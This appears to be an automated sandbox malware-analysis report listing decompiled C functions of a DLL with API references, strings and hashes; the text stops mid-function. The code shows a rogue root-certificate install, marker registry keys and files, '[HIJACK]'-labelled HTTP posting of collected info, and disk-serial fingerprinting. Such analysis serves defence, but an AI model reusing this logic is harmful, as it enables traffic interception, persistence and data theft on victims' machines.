                                                                                                                                                                  • Instruction Fuzzy Hash: 7851B6B991430956E710CB71AC89FDA72B8EB20345F440864F91ADD182FBB1F7C8CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E1001FA90(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				char _v267;
                                                                                                                                                                  				char _v268;
                                                                                                                                                                  				char _v531;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				char _v536;
                                                                                                                                                                  				char _v803;
                                                                                                                                                                  				char _v804;
                                                                                                                                                                  				void* _t44;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  				void* _t48;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  
                                                                                                                                                                  				_t94 = __eflags;
                                                                                                                                                                  				_t77 = __edi;
                                                                                                                                                                  				_v536 = 0;
                                                                                                                                                                  				_v532 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v531, 0, 0x103);
                                                                                                                                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
                                                                                                                                                                  				E1000CDB3( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
                                                                                                                                                                  				_v804 = 0;
                                                                                                                                                                  				E1000CF80(_t77,  &_v803, 0, 0x103);
                                                                                                                                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
                                                                                                                                                                  				E1000CDB3( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
                                                                                                                                                                  				_v268 = 0;
                                                                                                                                                                  				E1000CF80(_t77,  &_v267, 0, 0x103);
                                                                                                                                                                  				E1001F9F0(__ebx, _t77, __esi, _t94,  &_v268);
                                                                                                                                                                  				_t44 = E1001F6E0(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
                                                                                                                                                                  				_t95 = _t44;
                                                                                                                                                                  				if(_t44 != 0) {
                                                                                                                                                                  					_t46 = E1001F6E0(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
                                                                                                                                                                  					_t96 = _t46;
                                                                                                                                                                  					if(_t46 != 0) {
                                                                                                                                                                  						_t48 = E1001F650( &_v532, _t96,  &_v532, _a4, _a8);
                                                                                                                                                                  						_t97 = _t48;
                                                                                                                                                                  						if(_t48 != 0) {
                                                                                                                                                                  							_t50 = E1001F6E0( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
                                                                                                                                                                  							_t98 = _t50;
                                                                                                                                                                  							if(_t50 != 0) {
                                                                                                                                                                  								_t52 = E1001F6E0(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
                                                                                                                                                                  								_t99 = _t52;
                                                                                                                                                                  								if(_t52 != 0 && E1001F650(_a4, _t99,  &_v804, _a4, _a8) != 0) {
                                                                                                                                                                  									_t55 = E1001F780(__ebx, _t77, __esi, _a4, _a8);
                                                                                                                                                                  									_t101 = _t55;
                                                                                                                                                                  									if(_t55 != 0 && E1001F6E0( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
                                                                                                                                                                  										_v536 = 1;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v536;
                                                                                                                                                                  			}


















                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FAB8
                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FACD
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FAE4
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FB01
                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FB16
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FB2D
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FB4A
                                                                                                                                                                    • Part of subcall function 1001F9F0: _memset.LIBCMT ref: 1001FA0E
                                                                                                                                                                    • Part of subcall function 1001F9F0: _strcat_s.LIBCMT ref: 1001FA41
                                                                                                                                                                    • Part of subcall function 1001F9F0: _sprintf.LIBCMT ref: 1001FA68
                                                                                                                                                                    • Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
                                                                                                                                                                    • Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
                                                                                                                                                                    • Part of subcall function 1001F780: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813
                                                                                                                                                                    • Part of subcall function 1001F780: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
                                                                                                                                                                    • Part of subcall function 1001F780: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
                                                                                                                                                                    • Part of subcall function 1001F780: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
                                                                                                                                                                    • Part of subcall function 1001F780: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB8B
                                                                                                                                                                  • \Microsoft\Windows\win_a.dat, xrefs: 1001FAD3
                                                                                                                                                                  • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB69
                                                                                                                                                                  • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FB1C
                                                                                                                                                                  • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FBCC
                                                                                                                                                                  • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FBEA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                                  • API String ID: 475603772-4188859120
                                                                                                                                                                  • Opcode ID: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
                                                                                                                                                                  • Instruction ID: 4e31c407b2421ecadd55cccd68f5b7507d928531dec073e07e65c36de6934fcb
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
                                                                                                                                                                  • Instruction Fuzzy Hash: BF41577AA00108B7E704DAA0DC46FF9336CDB64344F404098FE1C9A182EB71EB848BA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E100212F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char* _v16;
                                                                                                                                                                  				char* _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				char _v35;
                                                                                                                                                                  				char _v39;
                                                                                                                                                                  				char _v43;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				void* _t86;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				intOrPtr _t91;
                                                                                                                                                                  				void* _t92;
                                                                                                                                                                  				void* _t120;
                                                                                                                                                                  				void* _t140;
                                                                                                                                                                  				void* _t141;
                                                                                                                                                                  				void* _t191;
                                                                                                                                                                  				void* _t192;
                                                                                                                                                                  				void* _t193;
                                                                                                                                                                  				void* _t194;
                                                                                                                                                                  				void* _t195;
                                                                                                                                                                  				void* _t196;
                                                                                                                                                                  
                                                                                                                                                                  				_t192 = __esi;
                                                                                                                                                                  				_t191 = __edi;
                                                                                                                                                                  				_t141 = __ebx;
                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                  				_v20 = "https://";
                                                                                                                                                                  				_v16 = "http://";
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v43 = 0;
                                                                                                                                                                  				_v39 = 0;
                                                                                                                                                                  				_v35 = 0;
                                                                                                                                                                  				_t86 = E10001A50(_a4, _v20);
                                                                                                                                                                  				_t194 = _t193 + 8;
                                                                                                                                                                  				if(_t86 != 0) {
                                                                                                                                                                  					L2:
                                                                                                                                                                  					_v8 = _a4;
                                                                                                                                                                  					_t88 = E10001A50(_a4, _v20);
                                                                                                                                                                  					_t195 = _t194 + 8;
                                                                                                                                                                  					if(_t88 == 0) {
                                                                                                                                                                  						 *_a8 = 0;
                                                                                                                                                                  						_v8 = _v8 + 7;
                                                                                                                                                                  						 *_a20 = 0x50;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						 *_a8 = 1;
                                                                                                                                                                  						_v8 = _v8 + 8;
                                                                                                                                                                  						 *_a20 = 0x1bb;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t91 = E10001A50(_v8, "/");
                                                                                                                                                                  					_t196 = _t195 + 8;
                                                                                                                                                                  					_v28 = _t91;
                                                                                                                                                                  					if(_v28 == 0) {
                                                                                                                                                                  						_t92 = E1000CAD0(_v8);
                                                                                                                                                                  						_t196 = _t196 + 4;
                                                                                                                                                                  						_v24 = _t92 + 1;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v24 = _v28 - _v8 + 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					 *_a12 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                                  					E1000CF80(_t191,  *_a12, 0, _v24);
                                                                                                                                                                  					E1000D1F0(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
                                                                                                                                                                  					_v28 = E10001A50(_v8, "/");
                                                                                                                                                                  					if(_v28 == 0) {
                                                                                                                                                                  						_v24 = 2;
                                                                                                                                                                  						 *_a24 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                                  						E1000CF80(_t191,  *_a24, 0, _v24);
                                                                                                                                                                  						E1000E2E0( *_a24, "/");
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v24 = E1000CAD0(_v8) - _v28 - _v8 + 1;
                                                                                                                                                                  						 *_a24 = L1000CEAF(_t141, _v28 - _v8, _t191, _t192, _v24);
                                                                                                                                                                  						E1000CF80(_t191,  *_a24, 0, _v24);
                                                                                                                                                                  						E1000E2E0( *_a24, _v28);
                                                                                                                                                                  					}
                                                                                                                                                                  					_v8 = E10001A50( *_a12, ":");
                                                                                                                                                                  					if(_v8 == 0) {
                                                                                                                                                                  						_t181 = _a12;
                                                                                                                                                                  						_v24 = E1000CAD0( *_a12) + 1;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v24 = _v8 -  *_a12 + 1;
                                                                                                                                                                  						_t120 = E1000CAD0( *_a12);
                                                                                                                                                                  						_t181 =  &_v44;
                                                                                                                                                                  						E1000D1F0(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
                                                                                                                                                                  						E1000E645( &_v44, "%d", _a20);
                                                                                                                                                                  					}
                                                                                                                                                                  					 *_a16 = L1000CEAF(_t141, _t181, _t191, _t192, _v24);
                                                                                                                                                                  					E1000CF80(_t191,  *_a16, 0, _v24);
                                                                                                                                                                  					E1000D1F0(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
                                                                                                                                                                  					_v32 = 1;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t140 = E10001A50(_a4, _v16);
                                                                                                                                                                  					_t194 = _t194 + 8;
                                                                                                                                                                  					if(_t140 != 0) {
                                                                                                                                                                  						goto L2;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v32;
                                                                                                                                                                  			}



























                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002135c
                                                                                                                                                                  0x1002159f

APIs
Memory Dump Source
• Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
• Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
Similarity
• API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
• String ID:
• API String ID: 3056589307-0
• Opcode ID: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
• Instruction ID: 4b51f2b05251f5ad84218d7a5ee60ac0fbdcfae77a21dec9d6b54221d6e01b8d
• Opcode Fuzzy Hash: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
• Instruction Fuzzy Hash: 82912BF9E00209EFDB04CFA4D981AEFB7B5EF48344F104568E905AB345E635EA14CBA1
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E10022D00(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v48;
                                                                                                                                                                  				char _v76;
                                                                                                                                                                  				char _v104;
                                                                                                                                                                  				char _v132;
                                                                                                                                                                  				intOrPtr _v136;
                                                                                                                                                                  				char _v164;
                                                                                                                                                                  				char _v192;
                                                                                                                                                                  				char _v220;
                                                                                                                                                                  				signed int _v224;
                                                                                                                                                                  				intOrPtr _v228;
                                                                                                                                                                  				intOrPtr _v232;
                                                                                                                                                                  				intOrPtr _v236;
                                                                                                                                                                  				intOrPtr _v240;
                                                                                                                                                                  				intOrPtr _v244;
                                                                                                                                                                  				intOrPtr _v248;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                                  				void* _t109;
                                                                                                                                                                  				void* _t110;
                                                                                                                                                                  				void* _t113;
                                                                                                                                                                  				intOrPtr _t154;
                                                                                                                                                                  				intOrPtr _t157;
                                                                                                                                                                  				void* _t160;
                                                                                                                                                                  				void* _t164;
                                                                                                                                                                  
                                                                                                                                                                  				_t164 = __eflags;
                                                                                                                                                                  				_t156 = __esi;
                                                                                                                                                                  				_t155 = __edi;
                                                                                                                                                                  				_t114 = __ebx;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E100232E0);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t157;
                                                                                                                                                                  				_v224 = 0;
                                                                                                                                                                  				_push(_a12);
                                                                                                                                                                  				_push(0x4c);
                                                                                                                                                                  				_push("post_info");
                                                                                                                                                                  				E1001F230(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                                  				_v48 = 0;
                                                                                                                                                                  				_t77 = E10022530(__ebx, __edi, __esi, _t164, _a12);
                                                                                                                                                                  				_t160 = _t157 - 0xe8 + 0x18;
                                                                                                                                                                  				_v136 = _t77;
                                                                                                                                                                  				E10001160( &_v132, _t164, 0x10025ca2);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				E10001160( &_v104, _t164, "info=");
                                                                                                                                                                  				_v8 = 1;
                                                                                                                                                                  				_v228 = E10001160( &_v164, _t164, _v136);
                                                                                                                                                                  				_v232 = _v228;
                                                                                                                                                                  				_v8 = 2;
                                                                                                                                                                  				E10001A90( &_v104, _v232);
                                                                                                                                                                  				_v8 = 1;
                                                                                                                                                                  				E100011A0( &_v164);
                                                                                                                                                                  				E10001160( &_v44, _t164, 0x10025ca3);
                                                                                                                                                                  				_v8 = 3;
                                                                                                                                                                  				E10001160( &_v76, _t164, 0x10025cb9);
                                                                                                                                                                  				_v8 = 4;
                                                                                                                                                                  				_v48 = 0;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					_t165 = _v48 - 6;
                                                                                                                                                                  					if(_v48 > 6) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					E100011C0( &_v132, 0x10025cba);
                                                                                                                                                                  					_v236 = E10022710(_t114, _t155, _t156, _t165,  &_v192, _v48);
                                                                                                                                                                  					_v240 = _v236;
                                                                                                                                                                  					_v8 = 5;
                                                                                                                                                                  					E10001A70( &_v132, _v240);
                                                                                                                                                                  					_v8 = 4;
                                                                                                                                                                  					E100011A0( &_v192);
                                                                                                                                                                  					_v244 = E10001160( &_v220, _t165, _a8);
                                                                                                                                                                  					_v248 = _v244;
                                                                                                                                                                  					_v8 = 6;
                                                                                                                                                                  					E10001A90( &_v132, _v248);
                                                                                                                                                                  					_v8 = 4;
                                                                                                                                                                  					E100011A0( &_v220);
                                                                                                                                                                  					_push(E100011E0( &_v132));
                                                                                                                                                                  					_push(0x61);
                                                                                                                                                                  					_push("post_info");
                                                                                                                                                                  					E1001F230(_t155, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                                  					E100011C0( &_v44, 0x10025cbb);
                                                                                                                                                                  					E100011C0( &_v76, 0x10025cce);
                                                                                                                                                                  					_t109 = E10001200( &_v104);
                                                                                                                                                                  					_t110 = E100011E0( &_v104);
                                                                                                                                                                  					E10021C30(_t114, _t155, _t156, _t165, 0, 0, 0, E100011E0( &_v132), 2, 1, 0, _t110, _t109, 0, 0, 0, 0, 0, 0,  &_v44,  &_v76);
                                                                                                                                                                  					_t160 = _t160 + 0x60;
                                                                                                                                                                  					_t113 = E10001200( &_v44);
                                                                                                                                                                  					_t166 = _t113;
                                                                                                                                                                  					if(_t113 == 0) {
                                                                                                                                                                  						_t154 = _v48 + 1;
                                                                                                                                                                  						__eflags = _t154;
                                                                                                                                                                  						_v48 = _t154;
                                                                                                                                                                  						continue;
                                                                                                                                                                  					} else {
                                                                                                                                                                  					}
                                                                                                                                                                  					break;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_v136);
                                                                                                                                                                  				E1000CA40(_t114, _t155, _t156, _t166);
                                                                                                                                                                  				E10001110(_a4, _t166,  &_v76);
                                                                                                                                                                  				_v224 = _v224 | 0x00000001;
                                                                                                                                                                  				_v8 = 3;
                                                                                                                                                                  				E100011A0( &_v76);
                                                                                                                                                                  				_v8 = 1;
                                                                                                                                                                  				E100011A0( &_v44);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				E100011A0( &_v104);
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				E100011A0( &_v132);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _a4;
                                                                                                                                                                  			}






























                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e08
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022e16
                                                                                                                                                                  0x10022e2e
                                                                                                                                                                  0x10022e3a
                                                                                                                                                                  0x10022e40
                                                                                                                                                                  0x10022e4e
                                                                                                                                                                  0x10022e53
                                                                                                                                                                  0x10022e5d
                                                                                                                                                                  0x10022e71
                                                                                                                                                                  0x10022e7d
                                                                                                                                                                  0x10022e83
                                                                                                                                                                  0x10022e91
                                                                                                                                                                  0x10022e96
                                                                                                                                                                  0x10022ea0
                                                                                                                                                                  0x10022ead
                                                                                                                                                                  0x10022eae
                                                                                                                                                                  0x10022eb0
                                                                                                                                                                  0x10022ec6
                                                                                                                                                                  0x10022ed6
                                                                                                                                                                  0x10022ee3
                                                                                                                                                                  0x10022eff
                                                                                                                                                                  0x10022f08
                                                                                                                                                                  0x10022f23
                                                                                                                                                                  0x10022f28
                                                                                                                                                                  0x10022f2e
                                                                                                                                                                  0x10022f33
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022dfe
                                                                                                                                                                  0x10022dfe
                                                                                                                                                                  0x10022e01
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f37
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022f44
                                                                                                                                                                  0x10022f45
                                                                                                                                                                  0x10022f54
                                                                                                                                                                  0x10022f62
                                                                                                                                                                  0x10022f68
                                                                                                                                                                  0x10022f6f
                                                                                                                                                                  0x10022f74
                                                                                                                                                                  0x10022f7b
                                                                                                                                                                  0x10022f80
                                                                                                                                                                  0x10022f87
                                                                                                                                                                  0x10022f8c
                                                                                                                                                                  0x10022f96
                                                                                                                                                                  0x10022fa1
                                                                                                                                                                  0x10022fab

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000004C,?), ref: 10022D38
                                                                                                                                                                    • Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                    • Part of subcall function 10022530: _memset.LIBCMT ref: 10022584
                                                                                                                                                                    • Part of subcall function 10022530: _strlen.LIBCMT ref: 100225B8
                                                                                                                                                                    • Part of subcall function 10022530: _memset.LIBCMT ref: 10022626
                                                                                                                                                                    • Part of subcall function 10022530: _strlen.LIBCMT ref: 10022632
                                                                                                                                                                    • Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
                                                                                                                                                                    • Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$FileFindHttpNamePath_strlen$DebugLocalOpenOptionOutputStringTime
                                                                                                                                                                  • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                                  • API String ID: 2213638552-152146038
                                                                                                                                                                  • Opcode ID: 73bb963f22ba2c1732fff04cfbf30ba04fa5a5e8588cdd7c25535a6641d5ae82
                                                                                                                                                                  • Instruction ID: 8607acd66d3c23fd638f037442e906d60192c638072a9ab774b96db5fff67154
                                                                                                                                                                  • Opcode Fuzzy Hash: 73bb963f22ba2c1732fff04cfbf30ba04fa5a5e8588cdd7c25535a6641d5ae82
                                                                                                                                                                  • Instruction Fuzzy Hash: 57714E75D01248EBEB18DB94DD52BEEBB74EF18384F908098F60A77181EB712B45CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E1001D5C0(void* __edi, char* _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				struct _OVERLAPPED* _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				struct _OVERLAPPED* _v20;
                                                                                                                                                                  				struct _OVERLAPPED* _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				void* _v32;
                                                                                                                                                                  				short _v548;
                                                                                                                                                                  				char _v1010;
                                                                                                                                                                  				char _v1068;
                                                                                                                                                                  				char _v1070;
                                                                                                                                                                  				intOrPtr _v1084;
                                                                                                                                                                  				intOrPtr _v1092;
                                                                                                                                                                  				intOrPtr _v1096;
                                                                                                                                                                  				intOrPtr _v1100;
                                                                                                                                                                  				intOrPtr _v1104;
                                                                                                                                                                  				void _v1108;
                                                                                                                                                                  				char _v2132;
                                                                                                                                                                  				struct _OVERLAPPED* _v2136;
                                                                                                                                                                  				char _v2137;
                                                                                                                                                                  				long _v2144;
                                                                                                                                                                  				struct _OVERLAPPED* _v2148;
                                                                                                                                                                  				intOrPtr _v2152;
                                                                                                                                                                  				char* _v2156;
                                                                                                                                                                  				intOrPtr _t91;
                                                                                                                                                                  				intOrPtr _t96;
                                                                                                                                                                  				void* _t125;
                                                                                                                                                                  				void* _t126;
                                                                                                                                                                  				void* _t127;
                                                                                                                                                                  
                                                                                                                                                                  				_t125 = __edi;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v2136 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				do {
                                                                                                                                                                  					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
                                                                                                                                                                  					_t127 = _t127 + 0xc;
                                                                                                                                                                  					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
                                                                                                                                                                  					if(_v32 != 0xffffffff) {
                                                                                                                                                                  						_v12 = 0;
                                                                                                                                                                  						while(1 != 0) {
                                                                                                                                                                  							E1000CF80(_t125,  &_v1108, 0, 0x22d);
                                                                                                                                                                  							_t127 = _t127 + 0xc;
                                                                                                                                                                  							_v1104 = 0x49534353;
                                                                                                                                                                  							_v1100 = 0x4b534944;
                                                                                                                                                                  							_v1068 = _v12;
                                                                                                                                                                  							_v1108 = 0x1c;
                                                                                                                                                                  							_v1096 = 0x2710;
                                                                                                                                                                  							_v1084 = 0x211;
                                                                                                                                                                  							_v1092 = 0x1b0501;
                                                                                                                                                                  							_v1070 = 0xec;
                                                                                                                                                                  							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
                                                                                                                                                                  								L20:
                                                                                                                                                                  								if(_v2136 != 0) {
                                                                                                                                                                  									L23:
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_v12 =  &(_v12->Internal);
                                                                                                                                                                  									if(_v12 < 2) {
                                                                                                                                                                  										goto L23;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										continue;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_v16 = 0;
                                                                                                                                                                  								do {
                                                                                                                                                                  									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
                                                                                                                                                                  									_v16 = _v16 + 1;
                                                                                                                                                                  								} while (_v16 < 0x100);
                                                                                                                                                                  								_t91 = E1001CDD0( &_v2132);
                                                                                                                                                                  								_t127 = _t127 + 4;
                                                                                                                                                                  								_v28 = _t91;
                                                                                                                                                                  								_v2148 = 0;
                                                                                                                                                                  								_v8 = 0x104;
                                                                                                                                                                  								_v2156 = _a4;
                                                                                                                                                                  								_v2152 = _v28 - _a4;
                                                                                                                                                                  								while(_v8 != 0x80000106) {
                                                                                                                                                                  									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
                                                                                                                                                                  									if(_v2137 != 0) {
                                                                                                                                                                  										 *_v2156 = _v2137;
                                                                                                                                                                  										_v2156 = _v2156 + 1;
                                                                                                                                                                  										_t96 = _v8 - 1;
                                                                                                                                                                  										_v8 = _t96;
                                                                                                                                                                  										if(_t96 != 0) {
                                                                                                                                                                  											continue;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											L17:
